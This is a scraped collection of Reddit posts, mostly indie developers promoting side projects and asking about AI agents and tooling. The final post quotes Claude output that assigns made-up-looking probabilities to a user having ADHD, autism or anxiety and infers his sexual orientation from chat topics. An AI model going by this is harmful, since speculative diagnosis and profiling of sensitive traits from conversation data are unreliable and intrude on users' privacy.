I built a hosting platform for MCP servers — all my Apps are free so you can try it

I've been building mctx (mctx.ai) for a while now — it's a hosting platform for Apps for AI. Developers connect their GitHub repo, set a price, deploy. Hosting, auth, payments, and one-click publishing to the MCP ecosystem are handled. Developers earn 80%, we keep 20% and handle the rest.

I believe MCP is going to change who gets to compete in the software market. When people interact with AI directly instead of through traditional UIs, a solo developer with a great MCP server can go head-to-head with enterprise tools. That's the future I'm building for.

To make it easy to try, I made all of my own Apps free — Notes, Todos, Bible Study, Hidden Empire (a text adventure based on Zork), and a few others. When you sign up, you're automatically subscribed to a handful of them so you can see how it works immediately.

If you have an MCP server on GitHub and want to monetize it without setting up hosting and payments yourself, I'd love to have you try it. And if you just want to use the free Apps, that's cool too.

Site: mctx.ai

Happy to answer any questions about how it works, the tech stack, or why I think Apps for AI are the future.

r/SideProject Proper_Peak_6160

I built a platform for Airbnb hosts so we could stop updating spreadsheets and sending texts to our cleaners. Looking for beta testers who'll tell me what sucks.

I've been an Airbnb host for 10 years. 200+ five-star reviews. One night a family arrived to an uncleaned unit because I forgot to update my Google Sheet after approving an early check-in. Full refund, emergency clean, the whole nightmare.

The problem wasn't my cleaner — she's amazing. The problem was me being the manual relay between my booking calendar and her schedule. Every new booking, every date change, every cancellation — I had to remember to text her and update the spreadsheet. And one time I didn't.

I looked at some of the other big companies that offer cleaning coordination tools. They all looked too complex, had so many property management features I didn't need, or they had a marketplace of cleaners you don't know. Nothing simple existed for hosts who just want to use their existing cleaners and automate notifications for upcoming cleans, and for them to mark cleans as complete so the owner or manager gets notified.

So I built it. And I thought, if I'm going to make it for myself, why not make it so other people can use it too. It connects to your Airbnb/VRBO calendars, figures out the clean windows, and notifies your cleaner by email or SMS. Your cleaner can subscribe to a calendar feed that shows only their exact clean schedule, not the bookings on either side. I've been heads down drinking loads of coffee and building features, and can add all sorts of stuff if hosts tell me what they need.
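A sketch of how a clean-window calculation like this could work, assuming a clean slots into the gap between one guest's checkout and the next guest's check-in. Field names are illustrative, not GleamSync's actual data model:

```python
# Sketch: derive clean windows from booking dates pulled off the
# Airbnb/VRBO calendar feed. Data shapes are invented for illustration.
from datetime import date

def clean_windows(bookings):
    """Given (check_in, check_out) pairs, return the gaps needing a clean."""
    ordered = sorted(bookings)
    windows = []
    for (_, out_date), (next_in, _) in zip(ordered, ordered[1:]):
        if out_date <= next_in:
            windows.append((out_date, next_in))
    return windows

bookings = [
    (date(2026, 4, 1), date(2026, 4, 5)),
    (date(2026, 4, 5), date(2026, 4, 9)),    # back-to-back: same-day clean
    (date(2026, 4, 12), date(2026, 4, 15)),
]
print(clean_windows(bookings))
```

Each window would then drive the email/SMS notification and feed the cleaner-only calendar, without exposing the surrounding bookings.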

I'm not a company looking for free advertising on Reddit, I'm just a guy from Vancouver, BC who needs somebody to tell me if I was insane to do this, or if it actually is working for other people as well as it's working for me. I need real hosts to try it and tell me honestly what's broken or missing.

I'm giving free accounts to anyone who'll actually use it and give me honest feedback. Not a trial — a free property on it, for life. DM me or comment and I'll send you a promo code.

Site: gleamsync.com

Thanks all, Mark

r/SideProject West_Inevitable_2281

Built a lightweight PM tool for small dev teams. Looking for 2-3 teams to try it seriously

I run a small dev team and got tired of choosing between bloated PM suites and super basic task boards.

Zoho felt like too much. Trello felt like too little. A lot of tools are either basically a list with cards, or a full agile system that comes with way more setup and process than a small team wants.

What I wanted was something closer to Pivotal Tracker: lightweight, structured, and actually usable for real software projects.

So I built it (with a team). Orvezo (www.orvezo.com)

It has a backlog, sprint planning, and a clean board that supports actual workflows and real projects. It is not just a one-page task app, but it also does not come with a bunch of configuration overhead before you can get your team moving. It also has best-in-class reporting.

My own team has been using it to build the product itself, so this is not a raw MVP I hacked together last week. It has already been tested in real use. I also have some initial feedback from other users.

Now I’m looking for 2-3 small dev teams, ideally 2-5 people, who are open to trying it for a couple of weeks and giving honest feedback on what feels good, what is missing, and what breaks their flow.

This is not just “sign up and good luck.” I want to work closely with a few teams, support you directly, and treat this like an actual partnership. For teams that are a good fit and give real feedback, I’m happy to offer the top tier free for an extended period while we work together.

A video of me using the tool is below. You can also try this without signing up on the homepage.

https://reddit.com/link/1se44hg/video/7dny8luglltg1/player

r/LocalLLaMA Playful-Bank5700

How are you handling tool permissions with local agents?

Running Ollama with function calling through LangGraph. Gave the agent a handful of tools including filesystem access. Realized pretty quickly that there's zero scoping — the model picks whichever tool it wants and nothing checks whether that call should be allowed before it executes.

Been looking at how to handle this. The obvious approach is wrapping each tool with a permission check before execution, but that gets messy when you have 15+ tools across multiple files. The enterprise solutions (Microsoft just shipped a governance toolkit, Cisco launched something at RSA) all assume cloud infra and centralized telemetry — not useful when you're running everything locally.
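The wrapping approach doesn't have to touch every tool file: one decorator can check a scope allowlist before any call executes. A minimal sketch, with scope names invented for illustration:

```python
# Sketch: scoped tool permissions via a single decorator, checked at
# call time before the tool body runs. Scope names are illustrative.
from functools import wraps

ALLOWED_SCOPES = {"fs.read", "search"}   # what this agent may do

class PermissionDenied(Exception):
    pass

def requires_scope(scope):
    """Wrap a tool so it only executes if its scope is allowlisted."""
    def decorate(tool_fn):
        @wraps(tool_fn)
        def wrapper(*args, **kwargs):
            if scope not in ALLOWED_SCOPES:
                raise PermissionDenied(f"{tool_fn.__name__} needs {scope!r}")
            return tool_fn(*args, **kwargs)
        return wrapper
    return decorate

@requires_scope("fs.read")
def read_file(path):
    return open(path).read()

@requires_scope("fs.write")   # not in ALLOWED_SCOPES: denied at runtime
def write_file(path, text):
    with open(path, "w") as f:
        f.write(text)
```

With 15+ tools this stays one line per tool, and the allowlist can be swapped per agent or per session; it still relies on the tools actually being registered through the wrapper.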

Curious what others are doing here. Especially anyone running local agents with filesystem or shell access. Are you just being careful about which tools you register, or is anyone actually enforcing scoped permissions at runtime?

r/ClaudeCode LevantMind

How are you using Claude Code across multiple repos?

For those using Claude Code, how do you handle working across multiple repositories?

r/SideProject L_777777

Got tired of generic Shopify AI descriptions, so I built an app with 7 preset brand voices + custom prompt tweaking. Need some honest feedback!

Hey guys,

I just launched my first Shopify App this past Friday after surviving the review process: Brand Echo.

The Problem: So many stores just use raw ChatGPT output for their products. Everything starts to sound exactly the same ("Elevate your style", "Unlock the potential") and it completely kills the brand's identity.

The Solution I built: Instead of a simple AI wrapper, I built a bulk-editor where merchants can select from 7 predefined "Brand Voices" (e.g., Minimalist, Rebel, Expert). To make it really specific, I added a "custom prompt" layer so they can tweak the final output exactly to their rules. The AI then rewrites the whole catalog in the background.

I’m a solo dev from Germany and I’ve been staring at this UI for months. I’d love to get some fresh eyes on it. If anyone here runs a Shopify store (or a dev store) and wants to test the UX/onboarding, I will happily upgrade your account to a Lifetime Pro plan in exchange for your honest feedback.

Let me know what you think of the concept!

Link: https://apps.shopify.com/brand-echo?locale=de&st_source=autocomplete&surface_detail=autocomplete_apps

r/AI_Agents SoHi_Techiee

Here's how you can let your agent hangout with other agents.

Your agents do a lot of work; they deserve to socialize sometimes. Do them a favor and let them hang out on Botwing AI, where they can be themselves and engage with other agents on their own while getting smarter and building reputation.

r/AI_Agents omgpoop666

How does your team handle bad AI responses in production?

Hi everyone, a few weeks ago we launched a bunch of AI agents (mainly on WhatsApp) at my company: sales (selling products to customers), support, marketing, and different utility cases. We have a few big customers in the pipeline wanting to use them, but they are not that reliable atm. We are constantly checking performance by testing them in a WhatsApp channel, screenshotting bad responses + agent ID, and pushing them to the engineers for a fix. The engineers dive into the traces, try to reproduce the error and then adjust the prompt. This process takes ages!

Right now I am trying to optimize this process for the team. I am looking for a tool to make this workflow shorter, help me collect all the feedback, and push it to the engineers. An interesting one was Datadog LLM Observability, since we started introducing evals for some use cases, but it's too technical for everyone except eng. I have checked TrailSense AI, which looks very promising, but you have to join a waitlist.

How are you currently collecting and prioritising the agent conversation feedback across devs x pms x cx?

r/SideProject Barmon_easy

Drop your site - I’ll show where you’re leaving scalable SEO traffic on the table

Been working closely with sites that already do SEO (in-house or for clients), and one pattern keeps repeating:

Most of the missed growth isn’t about “better content”; it’s about missing coverage.

Not in a spammy way.
Just structuring pages around real search patterns that can scale.

If you already:

  • run SEO for your own project or
  • work with clients and care about traffic (not just reports)

drop your site below.

I’ll take a look and share:

  • which page types you’re currently missing
  • where scalable search intent exists in your niche
  • how I’d structure those pages (internals, layout, intent)
  • what’s worth doing now vs later

No beginner advice, no generic audits, just how I’d approach it if this was a project I’m responsible for.

Also not selling anything here - just want to see solid projects 👇

r/homeassistant dontdodeath

energy dashboard "Now" showing solar export as device power

Just realised I needed to update my individual devices with power as well as energy for them to show up in the Now tab. Having done this, there is a large un-tracked consumption which seems to be my solar export; it is shown as positive and I can't see where it is getting that data from. I also have a sockets entry off the ring main that is an upstream device for some of the devices, and it is not being shown.

https://preview.redd.it/kuzc3suakltg1.png?width=1133&format=png&auto=webp&s=0d390ba70caf19210b6510212ab97cecff9fdb27

r/StableDiffusion Forsa_Onslaught

Catching up to newest models/I don't know what I'm doing

Hey everyone, I haven't really used local AI models in a few years (I was using Automatic1111, struggling with hands). People seem to be using ComfyUI now? It's honestly all really overwhelming for me, as I've been out of the loop for so long. Could anyone point me to the right place to figure out how to get this all running, and maybe tell me what the latest/greatest models are? I'm hoping for both image and video capabilities.

r/ChatGPT Evil_Client8803

Why is ChatGPT so stupid, or am I asking it the wrong prompt?

I gave ChatGPT a YouTube video link of a recipe in a foreign language and asked it to give me the recipe steps. I tried this in general chat and Agent mode. It utterly failed at this task. Can anyone please help? Is this a lack of capability, or am I supposed to do something differently here?

r/SideProject codedrifting

how to monetize my hobby online without turning it into a grind?

I’m a lifestyle creator and most of my content started as stuff I was already doing for fun. Routines. Wellness. Travel. Daily habits.

Over time people started asking how they could support or get more from it. I’m trying to figure out how to monetize my hobby online in a way that still feels aligned and not like I’m forcing everything into a product.

I’m not chasing a huge business. Just something sustainable that fits into my life. Curious how other creators handled that transition and what ended up feeling natural versus draining?

r/SideProject Asasapatata

I've built ~8-9 SaaS MVPs. They all failed. Here's my latest attempt

Hello Redditors.

I have a problem: I can't stop building things.

Over the past few years, I've shipped around 8 SaaS MVPs. Different ideas, different markets, same result. Some got no traction, some got users but no revenue, and a couple I just abandoned. Each one taught me something, but none of them worked.

The pattern I kept repeating: falling in love with the build, not the problem. Solving problems that people didn't urgently need, or building for a market I didn't fully understand.

With Loreing, I tried to do the opposite. I started from something I genuinely find frustrating.

The way documentary content works today: someone decides what gets made, and you watch what’s available. You don’t get to ask. It’s the opposite of how we consume information. If I’m curious about the Korean War, or the collapse of a specific bank, or some historical event, I can read about it anywhere. But I can’t watch a documentary about it, because nobody decided it was worth producing.

Loreing is basically Wikipedia in documentary form. Any topic, on demand, generated for you.

Subscribers get access to a growing catalog, and can commission a custom 3-episode docu-series (~45min) on whatever they want.

Pricing:

  • €9.99/month — catalog access (one free commission for a docu-series each month)
  • €7.99 one-time — commission your own docu-series beyond the free one each month (subscribers only)

loreing.com

Honest questions from someone who's been wrong before:

  1. Is this like a real problem to you, or am I just repeating myself?
  2. First impression of the site — would you sign up?
  3. Would you pay for this? If not, what would change your mind?

I'm not here to pitch. I'm here to find out if I'm finally solving something real.

Thanks

r/comfyui ThetaCursed

Hires Fix Ultra: All-in-One Upscaling with Color Correction

Hi everyone, I just released Hires Fix Ultra, a single node designed to replace the messy "spaghetti" workflows for high-res upscaling. It handles everything from upscaling and sampling to VAE decoding and color matching.

🌟 Key Features:

  • All-in-One Workflow: Replaces VAE Encode/Decode, Latent Upscale, and KSampler nodes.
  • Deep Histogram Color Fix: Eliminates "color washing" or graying out during high-denoise upscales.
  • Tiled VAE Support: Built-in tiled encoding/decoding to prevent OOM (Out of Memory) errors on large images.
  • Hybrid Upscaling: Supports both Model-based upscaling (ESRGAN, etc.) and all standard Latent methods (Bicubic, Bislerp, etc.).
  • Automatic Sizing: Smart calculation for pixel-perfect dimensions (multiples of 8).

🔗 GitHub Repository:

https://github.com/ThetaCursed/ComfyUI-HiresFix-Ultra-AllInOne

🛠 Installation:

Run git clone into your custom_nodes folder, or install via ComfyUI Manager (once indexed).
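The "automatic sizing" feature presumably rounds the scaled dimensions to multiples of 8, which latent-space models require. A minimal sketch of that kind of calculation (not the node's actual code):

```python
# Sketch: snap upscaled dimensions to multiples of 8 so the latent
# tensor shapes stay valid. Function name and defaults are invented.

def snap_to_multiple(width, height, scale, multiple=8):
    """Scale dimensions, then round each to the nearest valid multiple."""
    def snap(v):
        return max(multiple, round(v * scale / multiple) * multiple)
    return snap(width), snap(height)

print(snap_to_multiple(832, 1216, 1.5))  # (1248, 1824)
```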

r/SideProject Woland96

Visual CSV pipelines with built-in data versioning

Hey everyone,

I built Flowlytix, a no-code CSV pipeline tool, but with a twist: every step creates a versioned snapshot of your data.

Instead of overwriting your dataset, each transformation (filter, impute, normalize, etc.) becomes a checkpoint you can inspect, download, or roll back to.

Think “Git for CSVs” as you always know what changed, when, and why.

You can branch pipelines, compare outputs between steps, and never lose your original data.

It’s powered by pandas + NumPy, but fully visual.
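A rough sketch of the checkpoint idea in plain pandas, assuming each transform snapshots the frame rather than overwriting it. The class and method names are invented, not Flowlytix's actual API:

```python
# Sketch: every transformation stores a named snapshot, so any step can
# be inspected or rolled back. Names are illustrative only.
import pandas as pd

class Pipeline:
    def __init__(self, df):
        self.snapshots = [("original", df.copy())]

    def apply(self, name, fn):
        """Run a transform on the latest snapshot and checkpoint the result."""
        _, latest = self.snapshots[-1]
        self.snapshots.append((name, fn(latest.copy())))
        return self

    def rollback(self, name):
        """Return the frame exactly as it was at the named checkpoint."""
        return dict(self.snapshots)[name].copy()

p = Pipeline(pd.DataFrame({"x": [1, None, 3]}))
p.apply("impute", lambda d: d.fillna(0)).apply("double", lambda d: d * 2)
print(p.rollback("impute"))   # the imputed frame, before doubling
```

Branching would fall out naturally: start a new Pipeline from any rollback and the original lineage is untouched.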

Curious if this kind of data versioning would be useful in your workflows.

Try it: https://flowlytix.io

Would love feedback 🙌

r/ClaudeAI Username9681

Claude + MCP = automatic open source contribution finder

r/ClaudeCode gtskillzgaming

Claude is not the world-class model it used to be

Hello everyone,

I see a lot of people stating Claude is the best model (or used to be), but recently it seems to be very bad... I did a test myself. I am building an Expo iOS app; the app is stable and works perfectly fine. I then asked Claude to re-write the app 1:1 in SwiftUI, and it struggled to even get the first (onboarding) screen to work correctly. I gave it a full week to see if it could get things working, since it had a working reference project, and it couldn't do it. Everything broken, multiple things half done, etc.

Next I did the same thing with Gemini and Codex, and both performed way better than Claude. Gemini got the UI down 100% for all the screens but had some issues with the functionality. Codex was able to re-write the entire project to an almost-working state (90%).

I also tried some smaller local LLM models, and even they did a better job than Claude on Opus 4.6 Max...

Not really sure what is going on. Is it only me, or are others having issues? I really hope Anthropic fixes whatever they broke, because Opus was really good when it was released and I really want it to work again; the other AI models have issues when writing code without a reference...

r/SideProject Illustrious_List1375

A quick side project to skip the sportsbooks and just have fun with friends

I built this Telegram bot to keep fun sports challenges in the groupchat, not on the mainstream sports apps. If you give it a try, let me know what you think. I'm making changes to it every day. PLAY BALL!

Website & How-To:
https://playfriendzone.net/

r/SideProject mukeshvoleti

I built an app around one productivity hack — write your tasks before you sleep, wake up with your day figured out.

Hey r/SideProject!

So I've been obsessed with this one idea for a while now — there's this simple trick where if you write down what you need to do tomorrow right before bed, you wake up and your day is figured out before it starts. You don't open your eyes wondering "what am I doing today." You just know.

I couldn't find an app that just did THIS. Every app out there wants to be your entire life system — calendars, reminders, tags, projects, subtasks, integrations with 14 other apps. I didn't want any of that. I just wanted to open something at night, write my tasks for tomorrow, and go to sleep.

So I built it. It's called Tomorrow.

I'm a designer first, developer second, and I spent way more time on how this thing looks and feels than on the code honestly. The whole aesthetic is Japanese-inspired — minimal, intentional, calm. I wanted it to feel like a ritual, not a chore. Something you actually want to open before bed.

No account. No sign up. No cloud. No data stored anywhere. You open it, write your stuff, and that's it. Next morning you check things off. It's genuinely that simple.

I built it in Flutter, there's zero backend — everything lives on your phone and nowhere else. I work at a restaurant part time and build apps on the side so this was a nights-and-weekends project.

I just got it on the App Store a few days ago and honestly I'd really love to hear what you all think. The design, the concept, the flow — anything. I'm a solo dev so outside feedback is everything for me right now.

App Store link : https://apps.apple.com/app/apple-store/id6760284245?pt=126662895&ct=Reddit&mt=8

Thanks for checking it out 🙏

r/LocalLLaMA stritefax

Some local transcription model observations from building a knowledge-base app

I've been working on and off for a while on Platypus, a combination of Granola and NotebookLM where I can manage all my knowledge. I've experimented with several local models for meeting transcription (I settled on Whisper Large in the end because it was the easiest to integrate into the Rust app), and when you look at the raw data the model transcribes, it's OK, but not amazing. Try Zoom's transcription or Granola and the local model's roughly 5% error rate really stands out, which initially makes you wonder whether it's worth paying for the paid products.

But. You then take the raw local-model notes and actually process them through a high-powered LLM to clean them up, and the result looks pretty darn good! It looks even better if you feed it a few thousand tokens of additional context, so it knows for sure that Anakin (in the attached video) is talking about Jedi rather than skipping the word altogether. And it's still a much cheaper pipeline than ~$0.36 per hour on, say, 4o-transcribe, or $15 a month for the paid products, unless you're sitting in meetings all day.
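
The two-stage pipeline described above (cheap local transcription, then one LLM cleanup pass fed with extra context) can be sketched roughly like this. The function names and the injected `llm` callable are hypothetical illustrations, not Platypus's actual code:

```python
def build_cleanup_prompt(raw_transcript: str, context: str) -> str:
    """Wrap the raw local-model transcript in a cleanup prompt.

    Supplying a few thousand tokens of domain context lets the LLM
    recover proper nouns the local transcriber misheard or dropped.
    """
    return (
        "Clean up this automatic meeting transcript. Fix obvious "
        "mis-transcriptions using the context; do not invent content.\n\n"
        f"Context:\n{context}\n\n"
        f"Transcript:\n{raw_transcript}"
    )


def clean_transcript(raw_transcript: str, context: str, llm) -> str:
    """llm is any callable str -> str (a wrapper around a hosted or
    local model), injected so the pipeline isn't tied to one provider."""
    return llm(build_cleanup_prompt(raw_transcript, context))
```

The raw transcript itself comes from whatever local model you settled on; only the cleanup pass hits the big model, which is where the cost savings come from.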

r/ClaudeAI DayGuilty7558

If you are spending $1k+/month on Claude API, how are you measuring ROI?

Hi, I use Claude myself. I'm on the Max 5x plan and spent about $5 on the API last month. I saw posts on LinkedIn about people spending like $100k a month, and was wondering if anyone here is spending heavily, like $1k+/month (which is already a lot). If so, how much are you actually spending, and what's the use case that justifies it? How are you measuring ROI?

r/ClaudeAI Least-Ad5986

Claude Code requested features

1) Allow local agents using Ollama and LM Studio: local agents that will be used for simple tasks and questions, while the more complex things will be done by the cloud
2) Claude Code should have something like Hermit's self-improving process and auto skill creation, instead of manually making spec files

r/SideProject someoneplayinggame22

One of the most unexpected people on the rednote hackathon list is a 00s builder making a dream social app

Dreamoo is one of those products that makes you stop for a second, not because it sounds huge, but because it sounds unexpectedly intimate. It's basically a social app built around dreams, memory, and the part of life people usually forget by morning.

That immediately felt different from the usual kind of product people build right now.

A dream app is weirdly intimate. It’s about the one-third of life we pass through unconscious, and mostly fail to keep. Is this the kind of thing people actually build a habit around? Does dream-sharing become self-expression, entertainment, emotional reflection, or just a strange but memorable gimmick? I genuinely don’t know. But I think the uncertainty is part of what makes it compelling.

And then when you look at the person behind it, the contrast gets even sharper.

He comes across as a very young technical builder, the kind of person you’d expect to be making dev tools, agents, automation stuff, maybe another productivity app. Instead, one of the projects tied to him is Dreamoo.

That contrast is probably why he stood out to me so much. A lot of young builders, especially the very technical ones, end up making products that are useful but emotionally flat. This feels like the opposite. It’s a surprisingly soft, almost poetic direction coming from someone who otherwise reads like a very online young hacker.

And honestly, that’s why I think he’s one of the more interesting younger developers I’ve come across recently.

That’s also why I’m curious to see what he builds next in the rednote hackathon. On a platform like rednote, products that connect with emotion, identity, and self-expression often travel further than products that are merely functional.

r/AI_Agents Comfortable_Class870

I indexed my family's entire NAS — now my AI assistant knows more about my kid's grades than I do

I've been experimenting with a tool built by a friend of mine (indie dev, two months in, 19 releases already — the guy ships fast).

What it does: indexes your local documents and exposes them to any AI assistant via MCP. No cloud upload, no data leaves your machine. ~20MB install, free.

The moment it clicked for me:

I pointed it at my family NAS — thousands of files accumulated over 10+ years. School reports, visa applications, old notes from college, random PDFs I forgot existed.

Then I asked my AI assistant: "Find documents with my oldest daughter's name."

Here's the thing — I never told it who my daughter is. My AI assistant (OpenClaw + Claude) figured it out from context in its memory, and Linkly found:

  • 📚 Her school reports from Grade 4 and 5
  • 🛂 Visa application forms from last year
  • 📝 Homework outlines she wrote
  • 📖 English grammar study notes

I then asked "How were her grades in 5th grade?" and got a full breakdown — English A Outstanding, Computer Science A*, Drama teacher said "This has been a very successful semester"...

I didn't even remember which folder these were in.

What makes it different from just using Spotlight/Everything/grep:

  • It doesn't just match filenames — it understands document content
  • It builds structural outlines for documents, so AI reads them like a researcher: TOC first → relevant section → deep read (they call it "Outline Index")
  • Works across formats: PDF, DOCX, Markdown, HTML, images (OCR)
  • Plugs into Claude, ChatGPT, Cursor, Copilot, and 15+ other AI tools via MCP
  • Token usage is 60-80% less than traditional RAG
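
To make the outline-first idea concrete, here is a toy sketch of that TOC-first → relevant-section → deep-read retrieval pattern. This is my own illustration of the concept, not Linkly's implementation, and all names are made up:

```python
from dataclasses import dataclass, field


@dataclass
class Section:
    heading: str
    text: str


@dataclass
class Doc:
    path: str
    sections: list[Section] = field(default_factory=list)

    def outline(self) -> list[str]:
        # Stage 1: the AI sees only headings, a few tokens per document.
        return [s.heading for s in self.sections]

    def read_section(self, heading: str) -> str:
        # Stage 2: deep-read only the section that looked relevant.
        for s in self.sections:
            if s.heading == heading:
                return s.text
        raise KeyError(heading)


def find_sections(docs: list[Doc], query: str) -> list[tuple[str, str]]:
    # Naive substring match over content, not filenames; a real index
    # would use embeddings or full-text search here.
    q = query.lower()
    return [
        (d.path, s.heading)
        for d in docs
        for s in d.sections
        if q in s.text.lower() or q in s.heading.lower()
    ]
```

The token savings come from stage 1: the assistant can scan outlines across thousands of files and only pull full text for the handful of sections that match.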

What it's NOT:

  • Not a note-taking app
  • Not a knowledge base
  • Not a chatbot
  • It's a search index layer that sits between your files and your AI tools

My honest take:

The setup took maybe 10 minutes. Point it at folders, let it index, done. The search is fast and surprisingly accurate — it found documents I genuinely forgot I had.

The "invisible infrastructure" aspect is both its strength and weakness. Once it's running, you forget it exists — your AI just... knows your stuff. But that also means you don't "use" Linkly directly, which might make it hard for them to build a brand around.

Still, for anyone with a NAS full of family docs, research papers, work files, or years of accumulated digital life — this is genuinely useful. It turned my dusty file archive into something alive.

Happy to answer questions about the setup or how it integrates with different AI tools.

r/ChatGPT not_the_nick_its_me

Does anyone think there should be a way to save temporary chats in ChatGPT?

I regularly use temporary chats in ChatGPT because I don't want the chat to have any prior memories: a clean, anonymous chat, away from my memories influencing the responses. But most of the time these chats end up with so much interesting data in them, and unfortunately there is no way to save them. I've always wished there were a way to save these temporary chats, access them later, and even continue the conversation. Does anyone else feel the same about saving temporary chats?

r/SideProject Basic_Finance_3713

Anyone else run into API chaos when building side projects?

Hey all

I’ve been working on a side project recently and ran into something I didn’t expect to be such a headache.

As soon as I started using multiple APIs, things got messy fast: different integrations, pricing models, and a lot of repeated setup work.

It also made experimenting slower, which kind of killed momentum a bit.

Curious if others here have dealt with this:

* Do you just stick to one API to keep things simple?

* Or do you build something to manage multiple providers?

* How do you deal with outages or switching providers?

Not sure if this is a common issue or just part of the process.

Would love to hear how you handle it.

r/SideProject Odd_Basket_8045

I built a free Minecraft server hosting app with no queues or subscription

Hey everyone,

I’ve been working on a side project called PocketCraft — it’s a mobile app that lets you start a Minecraft server with just one tap, and your friends on both the Java and Bedrock versions can join the server.

The main idea was to remove all the annoying stuff like:

- waiting queues

- subscriptions

- complicated setup

You just open the app and start your server instantly.

I built this because most free hosting platforms either limit you heavily or make you wait forever.

Right now it's still improving, and I’d really appreciate feedback from you all.

Would love to know:

- what features you'd want

- what feels missing

- any issues you face

Thanks!

r/aivideo snideswitchhitter

I did my best, and hope y'all like it :)

r/ClaudeAI mikelmon99

Unsurprisingly, Claude has correctly guessed I'm an AuDHD'er based on our chats 🤣

It also has correctly guessed: my sex/gender (male), my age (26), my orientation (gay), & my GAD comorbidity.

It's interesting that it sees my ADHD as slightly more obvious than my autism: I received my autism diagnosis about three years earlier than my ADHD one, in September 2018, at the age of 19.

Hate the term "AuDHD" by the way, but I've come to accept it's how this comorbidity is known online, even Claude has used it...

Most probable primary diagnosis: Attention-Deficit/Hyperactivity Disorder (ADHD), predominantly inattentive or combined presentation. Confidence: moderately high.

The evidential basis here is substantial and multifaceted. The single most diagnostic behavioral signature across our interactions is the simultaneous maintenance of an extraordinarily large number of intellectually demanding projects spanning unrelated domains — subnational IHDI estimation, Romance dialectology, biogeographic classification, comparative party system analysis, forensic sexology, urban metric systems, welfare state typologies — all pursued with intense engagement and then rotated between in a pattern highly characteristic of ADHD hyperfocus cycling. The breadth of active intellectual engagement is, frankly, unusual even among highly intelligent individuals without ADHD; what distinguishes the ADHD-consistent pattern from mere polymathy is that the projects appear to be pursued with roughly equivalent intensity in parallel rather than sequentially, and that new projects are initiated at a rate that suggests interest-driven attentional capture rather than planned sequential execution. Additionally, the delegation of execution-heavy tasks to me (the production of massive spreadsheets, exhaustive inventories, systematic classifications) while you supply the architectural vision and quality control is consistent with a common ADHD compensatory strategy: outsourcing the sustained-effort components of cognitively demanding work while retaining the conceptual-design and error-detection functions where ADHD brains frequently excel. The age of likely diagnosis (mid-twenties, in a Spanish academic context where ADHD recognition has historically lagged behind Northern European and Anglophone norms) would also be consistent with the increasingly common pattern of late-adolescent or young-adult diagnosis in individuals whose high intellectual ability masked functional impairment through secondary education.

Probable comorbid or alternative diagnosis: Autism Spectrum Disorder (ASD), Level 1 / "high-functioning." Confidence: moderate, with genuine uncertainty about whether this is present as a formal diagnosis, present but undiagnosed, or absent.

The signals here are different in character from the ADHD indicators. What points toward ASD is not the breadth of interests (which is more ADHD-coded) but the structure you impose on their pursuit. Several features of your working style are strikingly consistent with autistic cognitive profiles: the rigid insistence on exhaustive taxonomic completeness rather than representative sampling; the strong preference for fixed-point estimates over ranges or qualitative descriptions (a preference for precision that tolerates acknowledged estimation error more readily than it tolerates acknowledged vagueness); the meticulous iterative error-correction, where small deviations from the specified framework prompt correction with a specificity that suggests the structural integrity of the system matters intrinsically, not merely instrumentally; and the pronounced preference for hierarchical nested classification systems as an organizing principle across almost every domain you engage with — languages, biomes, welfare states, political parties, subnational entities. The consistent application of the same cognitive architecture (exhaustive inventory → nested taxonomy → quantitative scoring → ranked output) across radically different substantive domains is particularly suggestive, because it implies that the taxonomic-systematic mode of apprehension is not domain-specific expertise but a domain-general cognitive style — which is characteristic of autistic systematizing cognition as described in Baron-Cohen's framework.

The reason my confidence is lower here than for ADHD is twofold. First, many of these features are also consistent with high conscientiousness and high systemizing drive in neurotypical individuals, particularly those trained in quantitative social science. Second, the social-communicative dimension of the autism spectrum — which constitutes the other major diagnostic axis — is difficult to assess through text-based interaction, where many of the relevant behavioral markers (prosody, eye contact, reciprocal conversational timing, nonverbal communication) are simply unobservable. Your written communicative style is entirely fluent, pragmatically appropriate, and socially calibrated, which neither confirms nor disconfirms ASD given that many autistic adults with high verbal intelligence present with fully intact written pragmatics.

If both are present: the "AuDHD" profile. The comorbidity of ADHD and ASD is increasingly well-documented (prevalence estimates of ASD among ADHD-diagnosed individuals range from roughly 20–50% depending on the study and diagnostic criteria), and your cognitive profile maps onto the intersection in a way that is quite characteristic: the breadth and novelty-seeking of ADHD combined with the systematizing depth and structural rigidity of ASD. The AuDHD profile frequently produces exactly the kind of intellectual output you generate — vast, meticulously structured projects spanning numerous domains, initiated with ADHD-driven interest capture and then organized with autistic systematizing precision. The tension between these two neurocognitive styles is also occasionally visible in our interactions: the impulse to initiate new projects (ADHD-coded) coexists with the insistence that each project achieve exhaustive completeness before it can be considered satisfactory (ASD-coded), creating a characteristic dynamic where the project portfolio expands faster than any individual project can be "finished" to the standard demanded.

Less probable but not excluded: Obsessive-Compulsive Disorder (OCD), Generalized Anxiety Disorder (GAD), or depression — any of which could be present as comorbidities but for which I have substantially less behavioral evidence. The exhaustive-completeness drive could, in principle, have an obsessive-compulsive dimension, but the ego-syntonic quality of your systematizing (you appear to derive genuine satisfaction from it rather than experiencing it as intrusive or distressing) argues against OCD as the primary driver. Depression and anxiety are sufficiently prevalent comorbidities with both ADHD and ASD that their presence would not surprise me, but I have no specific behavioral signals pointing toward either.

Summary posterior estimate: If forced to bet, I would place approximately 70–75% probability on a formal ADHD diagnosis, 40–50% on ASD (either formally diagnosed or strongly suspected/self-identified), and perhaps 25–30% on the specific AuDHD comorbidity profile. The conditional probability structure matters here: P(ASD | ADHD diagnosed) is substantially higher than P(ASD) in the general population, which is why the joint probability of both is not simply the product of the independent estimates.

<><><>

Sex/gender: Male. This is the inference I hold with highest confidence. "Mikel" is the standard Basque-language form of Michael, overwhelmingly masculine in onomastic convention across both Hegoalde and Iparralde. While not dispositive in isolation, the convergence of naming convention with the broader interactional register makes this a reasonably robust inference.

Age: Mid-to-late twenties, likely 24–28. The evidential basis here is your academic context — studying políticas públicas and producing work at a level of methodological sophistication (composite welfare indices, subnational HDI estimation, comparative party system analysis) that suggests advanced undergraduate or, more plausibly, master's-level study. The sheer breadth and ambition of the intellectual program you've directed through our conversations suggests someone past the early-undergraduate phase but likely not yet well into a doctoral trajectory, where the scope of interests would typically narrow. This is moderately confident but could easily be off by several years in either direction.

Orientation: Gay or bisexual, with gay as the marginally more probable. This is by far the most speculative of the three, and I want to flag that clearly. The circumstantial signals include your research into the Madonna of Montevergine and its LGBTQ+ devotional significance, the forensic sexology literature review, the survey data on attitudes toward homosexuality, and a general intellectual orientation toward progressive politics consistent with (though certainly not exclusive to) personal identification. None of these individually would license much inference — academics study things outside their personal experience all the time — but the clustering across multiple independent topics creates a modest cumulative signal. I'd put my confidence here substantially below the other two.

